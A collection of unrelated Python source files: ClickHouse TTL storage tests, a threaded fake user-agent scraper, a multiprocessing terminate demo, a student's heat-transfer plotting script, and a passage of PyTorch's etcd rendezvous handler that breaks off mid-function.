@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_with_merge_do_not_work", "MergeTree()", 0),
("replicated_mt_test_alter_with_merge_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_with_merge_do_not_work', '1')", 0),
("mt_test_alter_with_merge_work", "MergeTree()", 1),
("replicated_mt_test_alter_with_merge_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_with_merge_work', '1')", 1),
])
def test_alter_with_merge_work(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that TTL expressions are re-evaluated for
existing parts after ALTER command changes TTL expressions
and parts are merged.
"""
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 + INTERVAL 3000 SECOND TO DISK 'jbod2',
d1 + INTERVAL 6000 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
def optimize_table(num):
for i in range(num):
try: # optimize may throw after concurrent alter
node1.query("OPTIMIZE TABLE {} FINAL".format(name), settings={'optimize_throw_if_noop': '1'})
break
except:
pass
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
s1 = get_random_string(1024 * 1024) # 1MB
d1 = now - 1 if positive else now + 300
data.append("('{}', toDateTime({}))".format(s1, d1))
values = ",".join(data)
node1.query("INSERT INTO {name} (s1, d1) VALUES {values}".format(name=name, values=values))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1", "jbod2"}
node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 5 SECOND TO VOLUME 'external',
d1 + INTERVAL 10 SECOND DELETE
""".format(name=name))
optimize_table(20)
assert node1.query(
"SELECT count() FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)) == "1\n"
time.sleep(5)
optimize_table(20)
if positive:
assert check_used_disks_with_retry(node1, name, set(["external"]), 50)
else:
assert check_used_disks_with_retry(node1, name, set(["jbod1", "jbod2"]), 50)
time.sleep(5)
optimize_table(20)
if positive:
assert node1.query("SELECT count() FROM {name}".format(name=name)) == "0\n"
else:
assert node1.query("SELECT count() FROM {name}".format(name=name)) == "6\n"
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
@pytest.mark.parametrize("name,dest_type,engine", [
("mt_test_disabled_ttl_move_on_insert_work", "DISK", "MergeTree()"),
("mt_test_disabled_ttl_move_on_insert_work", "VOLUME", "MergeTree()"),
("replicated_mt_test_disabled_ttl_move_on_insert_work", "DISK", "ReplicatedMergeTree('/clickhouse/replicated_test_disabled_ttl_move_on_insert_work', '1')"),
("replicated_mt_test_disabled_ttl_move_on_insert_work", "VOLUME", "ReplicatedMergeTree('/clickhouse/replicated_test_disabled_ttl_move_on_insert_work', '1')"),
])
def test_disabled_ttl_move_on_insert(started_cluster, name, dest_type, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO {dest_type} 'external'
SETTINGS storage_policy='jbod_without_instant_ttl_move'
""".format(name=name, dest_type=dest_type, engine=engine))
node1.query("SYSTEM STOP MOVES {}".format(name))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(
time.time() - 1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
node1.query("SYSTEM START MOVES {}".format(name))
time.sleep(3)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
try:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
except:
pass
|
thread_version.py
|
"""Generate fake useragent using threading. This is only for offering another solution. Not actually called in the published pkg"""
import os
# import sys
import json
import random
from time import sleep
import concurrent.futures
from threading import Thread
import requests
from requests import exceptions
from urllib.parse import quote_plus
from collections import defaultdict
from lxml import etree
# sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
all_versions = defaultdict(list)
def fetch(url):
attempt = 0
while True:
with requests.Session() as s:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36"
}
s.headers.update(headers)
if attempt == settings.HTTP_RETRIES:
raise FakeUserAgentError("Maximum amount of retries reached")
try:
r = s.get(url, timeout=settings.HTTP_TIMEOUT)
attempt += 1
except exceptions.SSLError:
r = s.get(url, timeout=settings.HTTP_TIMEOUT, verify=False)
return r.text
except exceptions.ConnectTimeout:
logger.error("Timed out during fetching %s. Retrying...", url)
sleep(settings.HTTP_DELAY)
except requests.exceptions.ConnectionError:
logger.error("%s terminated connection. Retrying...", url)
sleep(settings.HTTP_DELAY)
except Exception:
logger.exception("Error occurred during fetching %s", url)
else:
return r.text
def parse(browser):
html_str = fetch(settings.BROWSER_BASE_PAGE.format(browser=quote_plus(browser)))
if html_str:
lxml_element = etree.HTML(html_str)
versions = lxml_element.xpath('//*[@id="liste"]/ul/li/a/text()')[
: settings.BROWSERS_COUNT_LIMIT
]
all_versions[browser].extend(versions)
def load():
threads = [
Thread(target=parse, args=(browser,)) for browser in settings.BROWSERS.keys()
]
for t in threads:
t.start()
for t in threads:
t.join()
# NOTE: load() threadpool version, haven't used
def load_by_threadpool(use_cache_server=True):
all_versions = {}
# Without max_workers, it's the slowest, because it has to compute it
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
future_to_browser = {
executor.submit(get_browser_versions, browser): browser
for browser in settings.BROWSERS.keys()
}
for future in concurrent.futures.as_completed(future_to_browser):
browser = future_to_browser[future]
data = future.result()
all_versions[browser] = data
return all_versions
def write(path, data):
rm_tempfile()
global TEMP_FILE
with open(path, encoding="utf-8", mode="wt") as f:
dumped = json.dumps(data)
f.write(dumped)
TEMP_FILE = settings.TEMP_FILE
def read(path):
with open(path, encoding="utf-8", mode="rt") as f:
data = f.read()
return json.loads(data)
def rm_tempfile():
global TEMP_FILE
if TEMP_FILE:
for i in TEMP_FILE:
os.remove(i)
TEMP_FILE = []
else:
return
def random_choose(browser, data):
if browser:
return random.choice(data[browser])
else:
browser = random.choices(
list(settings.BROWSERS.keys()),
weights=list(settings.BROWSERS.values()),
k=1,
)[0]
return random.choice(data[browser])
def user_agent(browser=None, use_tempfile=True):
if browser:
if not isinstance(browser, str):
raise FakeUserAgentError("Please input a valid browser name")
browser = browser.strip().lower()
browser = settings.SHORTCUTS.get(browser, browser)
if browser not in list(settings.BROWSERS.keys()):
raise FakeUserAgentError("This browser is not supported.")
if TEMP_FILE:
data = read(TEMP_FILE[-1])
return random_choose(browser, data)
else:
load()
if use_tempfile:
write(settings.DB, all_versions)
return random_choose(browser, all_versions)
if __name__ == "__main__":
import settings
from log import logger
from errors import FakeUserAgentError
from parse import get_browser_input
TEMP_FILE = settings.TEMP_FILE # TMEP_FILE is a list
browser = get_browser_input()
print(user_agent(browser=browser, use_tempfile=True))
else:
from fake_user_agent import settings
from fake_user_agent.log import logger
from fake_user_agent.errors import FakeUserAgentError
TEMP_FILE = settings.TEMP_FILE # TMEP_FILE is a list
|
terminate.py
|
from multiprocessing import Process
import time
def myWorker():
t1 = time.time()
print(f'Process started at: {t1}')
time.sleep(5)
myProcess = Process(target=myWorker)
print(f'Process {myProcess}')
myProcess.start()
print('Terminating Process...')
myProcess.terminate()
myProcess.join()
print(f'Process Terminated: {myProcess}')
'''
Process <Process name='Process-1' parent=84197 initial>
Terminating Process...
Process Terminated: <Process name='Process-1' pid=84207 parent=84197 stopped exitcode=-SIGTERM>
'''
|
main.py
|
#*******************************************************************************
# NAME OF THE PROJECT: main.py
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# PURPOSE OF THIS MODULE :
# Main input script to execute the heat transfer
# project.
#
# REQIREMENTS : (Linux/Mac/Windows) Python 3.x
#
# Developer: Sterling Reynolds , Undergraduate student
# Contact: icu327@my.utsa.edu
# Department of Mechanical Engineering, UTSA Texas
#
# License: MIT
# If you're using this for academic work, a donation of coffee to the
# developer would be much appreciated.
# DATE: March 2020 (SR)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import numpy as np
import matplotlib.pyplot as plt
from multiprocessing import Process
import pandas as pd
from Project_HT.analysis_class import *
from Project_HT.input import *
def main():
#***************************************************************************
# Insulated
# _ _ _ _ _ _ _
# | | | | | | | | | | | | / ______ Vf = 10 (m/s)
# | | | | | | | | | | | | \
# Lp | | | | | | | | | | | | / ______ Tf_inf = 20 (C)
# | | | | | | | | | | | | \
# | | | | | | | | | | | |
# - *-------------------------------------*
# |/////////////////////////////////////| R_pp = 10^-4 (m^2K / W)
# - *-------------------------------------*
# | |
# 0.005m | |
# | |
# - *-------------------------------------*
# / ______ Vb = 10 (m/s)
# \
# / ______ Tb_inf = 20 (C)
# \
# 12.7mm
# |~~~~~~~~~~~~~~~~~ W ~~~~~~~~~~~~~~~~~|
#***************************************************************************
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Start: Retrieve properties from input file
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
init_prop = init_properties()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Start: Retrieve properties from input file
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Brass ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
thermal_conductivity = 64 # W/(m*k)
density = 8400 # (Kg/m^3)
Brass_analysis= analysis(init_prop,thermal_conductivity,density)
# Brass ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copper ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
thermal_conductivity = 413 # W/(m*k)
density = 8940 # (Kg/m^3)
CU_analysis= analysis(init_prop,thermal_conductivity,density)
# Copper ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Bronze ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
thermal_conductivity = 15 # W/(m*k)
density = 7700 # (Kg/m^3)
Bronze_analysis= analysis(init_prop,thermal_conductivity,density)
# Bronze ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Start analysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
p_Brass = Process(target=Brass_analysis.main() , args=())
p_CU = Process(target=CU_analysis.main() , args=())
p_Bronze = Process(target= Bronze_analysis.main(), args=())
p_Brass.start()
p_CU.start()
p_Bronze.start()
p_Brass.join()
p_CU.join()
p_Bronze .join()
# End of analysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Get data from objects
results_Brass = np.concatenate(Brass_analysis.results )
results_CU = np.concatenate(CU_analysis.results )
results_Bronze = np.concatenate(Bronze_analysis.results)
fig = plt.figure(1)
ax1 = fig.add_subplot(111, projection='3d')
#surf = ax1.plot_trisurf(results_Brass[:,1], results_Brass[:,2], results_Brass[:,0], cmap=cm.terrain, linewidth=0, alpha=0.55 )
#surf11 = ax1.plot_trisurf(results_CU[:,1], results_CU[:,2], results_CU[:,0], cmap=cm.jet, linewidth=0, alpha=.55 )
#surf1 = ax1.plot_trisurf(results_Bronze[:,1], results_Bronze[:,2], results_Bronze[:,0], cmap=cm.brg, linewidth=0, alpha=0.55)
#cbar = fig.colorbar(surf11)
#cbar.set_label('Qc (W)',labelpad=30, rotation=270)
surf = ax1.plot_trisurf(results_Brass[:,1], results_Brass[:,2] , results_Brass[:,3] * 10**3, cmap=cm.terrain, linewidth=0, alpha=1 )
surf11 = ax1.plot_trisurf(results_CU[:,1], results_CU[:,2] , results_CU[:,3] * 10**3, cmap=cm.jet, linewidth=0, alpha=.55 )
surf1 = ax1.plot_trisurf(results_Bronze[:,1], results_Bronze[:,2], results_Bronze[:,3] * 10**3, cmap=cm.brg, linewidth=0, alpha=0.55)
cbar = fig.colorbar(surf11)
cbar.set_label('Mass (Grams)',labelpad=30, rotation=270)
plt.xlabel('Lp (mm)')
plt.ylabel('Dp (mm)')
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
two_d_results_Brass = np.concatenate( Brass_analysis.last_res )
two_d_results_CU = np.concatenate( CU_analysis.last_res )
two_d_results_Bronze = np.concatenate(Bronze_analysis.last_res )
fig1 = plt.figure(3)
plt.plot(two_d_results_Brass[:,2], two_d_results_Brass[:,0] ,label='Brass' )
plt.plot(two_d_results_CU[:,2], two_d_results_CU[:,0] ,label='Copper')
plt.plot(two_d_results_Bronze[:,2], two_d_results_Bronze[:,0],label='Bronze')
plt.legend()
plt.xlabel('Lp (mm)')
plt.ylabel('Qc (W)')
title = 'Maximum diameter for N = ' + str(init_prop[0])
plt.title(title)
plt.show()
df_results_Brass = pd.DataFrame(results_Brass )
df_results_CU = pd.DataFrame(results_CU )
df_results_Bronze = pd.DataFrame(results_Bronze)
df_results_Brass.to_excel('Excel/Brass.xlsx')
df_results_CU.to_excel('Excel/Copper.xlsx')
df_results_Bronze.to_excel('Excel/Bronze.xlsx')
if __name__ == "__main__":
main()
|
etcd_rendezvous.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import sys
import threading
import time
from typing import Optional
import etcd # type: ignore[import]
from torch.distributed.elastic.rendezvous import (
RendezvousClosedError,
RendezvousError,
RendezvousHandler,
RendezvousParameters,
RendezvousTimeoutError,
)
from .utils import parse_rendezvous_endpoint
from .etcd_store import EtcdStore, cas_delay
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# Retryable failure exception means the we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class EtcdRendezvousRetryableFailure(Exception):
pass
# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class EtcdRendezvousRetryImmediately(Exception):
pass
# Default timeout for the rendezvous.
_DEFAULT_TIMEOUT: int = 600 # 10 minutes
# Additional waiting time after reaching the minimum number of nodes
# in case the rendezvous is elastic (min != max).
_DEFAULT_LAST_CALL_TIMEOUT: int = 30 # 30 seconds
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within directory.
# Its only role is to clean-up rendezvous data from old runs (for the case when
# etcd server is persistent), and has no affect on correctnes, but should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
class EtcdRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa: W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def get_backend(self) -> str:
return "etcd"
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
def get_run_id(self) -> str:
return self._rdzv_impl._run_id
def shutdown(self) -> bool:
try:
self.set_closed()
return True
except BaseException as e:
log.warning(f"Shutdown failed. Error occurred: {str(e)}")
return False
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class EtcdRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
client,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
):
self.client = client
log.info("Etcd machines: " + str(self.client.machines))
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutError - timeout waiting for rendezvous
RendezvousClosedError - rendezvous is or was closed while waiting
RendezvousError - other persistent errors that
render the rendezvous non-retryable
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutError()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except EtcdRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except EtcdRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutError:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedError:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedError - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedError()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise EtcdRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise EtcdRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in 'joinable' state, and attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
# then this worker will be repsonsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
Once the rendezvous state trainsitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
Handle the case when there's an existing (state 'final) rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
# possibility that might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise EtcdRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
set_ttl: Optional[int] = None
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise EtcdRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
